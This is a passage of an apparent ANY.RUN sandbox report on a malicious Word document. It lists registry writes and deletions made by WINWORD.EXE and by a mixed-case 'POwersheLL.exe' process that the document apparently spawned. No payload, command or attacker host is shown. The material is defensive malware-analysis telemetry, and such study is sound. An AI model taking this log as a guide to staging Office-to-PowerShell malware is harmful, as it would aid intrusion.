(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: ITabStrip
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
Operation: write Name: (default)
Value: ISpinbutton
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
Operation: write Name: (default)
Value: IImage
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLSubmitButton
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLImage
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLReset
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLCheckbox
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLOption
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLText
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 13/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: IWHTMLHidden
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLPassword
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLSelect
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
Operation: write Name: (default)
Value: IWHTMLTextArea
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
Operation: write Name: (default)
Value: LabelControlEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
Operation: write Name: (default)
Value: CommandButtonEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: MdcTextEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: MdcListEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: MdcComboEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: MdcCheckBoxEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: MdcOptionButtonEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: MdcToggleButtonEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
Operation: write Name: (default)
Value: ScrollbarEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
Operation: write Name: (default)
Value: TabStripEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
Operation: write Name: (default)
Value: SpinbuttonEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
Operation: write Name: (default)
Value: ImageEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
Operation: write Name: (default)
Value: WHTMLControlEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents1
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents2
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents3
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 14/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: (default)
Value: WHTMLControlEvents4
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents5
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents6
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents7
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents9
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
Operation: write Name: (default)
Value: WHTMLControlEvents10
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
Operation: write Name: (default)
Value: IPage
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Operation: write Name: (default)
Value: Pages
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: IMultiPage
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
Operation: write Name: (default)
Value: MultiPageEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: ,x3
Value: 2C783300A80A0000010000000000000000000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete key Name: (default)
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: |3
Value: 207C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: |3
Value: 207C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: ?|3
Value: 3F7C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: ?|3
Value: 3F7C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: o|3
Value: 6F7C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: o|3
Value: 6F7C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (3828) POwersheLL.exe Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\16B\52C64B7E
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 15/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: LanguageList
Value: en-US
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: -}3
Value: 2D7D3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: -}3
Value: 2D7D3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: <}3
Value: 3C7D3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: <}3
Value: 3C7D3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASAPI32
Operation: write Name: EnableFileTracing
Value: 0
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASAPI32
Operation: write Name: EnableConsoleTracing
Value: 0
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASAPI32
Operation: write Name: FileTracingMask
Value:
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASAPI32
Operation: write Name: ConsoleTracingMask
Value:
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASAPI32
Operation: write Name: MaxFileSize
Value: 1048576
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASAPI32
Operation: write Name: FileDirectory
Value: %windir%\tracing
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASMANCS
Operation: write Name: EnableFileTracing
Value: 0
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASMANCS
Operation: write Name: EnableConsoleTracing
Value: 0
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASMANCS
Operation: write Name: FileTracingMask
Value:
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASMANCS
Operation: write Name: ConsoleTracingMask
Value:
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASMANCS
Operation: write Name: MaxFileSize
Value: 1048576
(PID) Process: (3828) POwersheLL.exe Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POwersheLL_RASMANCS
Operation: write Name: FileDirectory
Value: %windir%\tracing
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
Operation: write Name: 019C826E445A4649A5B00BF08FCC4EEE
Value: 01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F006
6006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F100A0C00000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFiles_3082
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 16/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F100C0400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFiles_1036
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10090400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFiles_1033
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10061400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp1_1046
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10031400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp1_1043
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10070400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFiles_1031
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10010400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp1_1025
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10001400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp1_1040
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10022400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp2_1058
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10091400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp1_1049
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10065400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp2_1110
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F100D2400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp2_1069
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10030400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp2_1027
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10021400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp6_1042
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F100F1400000000000F01FEC\Usage
Operation: write Name: SpellingAndGrammarFilesExp1_1055
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation: delete value Name: FontInfoCacheW
Value: 6000000060000000F5FFFFFF000000000000000000000000BC02000000000000004000225400610068006F006D00610000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000D0000000B000000020000000200000000000000060000001A000000BC0200000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C029000000000000
000100000000002820070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 17/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000D0000000B0000000200000002000000000000000500000017000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C029000
00000000000010000000000282006000000F7FFFFFF0000000000000000000000009001000000000000004000225400610068006F006D00610000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000B000000090000000200000002000000000000000400000013000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B60
00C02900000000000000010000000000282005000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Ami R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Arial Unicode MS
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Batang
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @BatangChe
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @DFKai-SB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Dotum
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @DotumChe
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Expo M
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @FangSong
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Gulim
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @GulimChe
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Gungsuh
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @GungsuhChe
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Headline R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGGothicE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGGothicM
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGGyoshotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGKyokashotai
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 18/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGMaruGothicMPRO
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGMinchoB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGMinchoE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPGothicE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPGothicM
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPGyoshotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPKyokashotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPMinchoB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPMinchoE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPSoeiKakugothicUB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPSoeiKakupoptai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGPSoeiPresenceEB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSeikaishotaiPRO
Value: 0
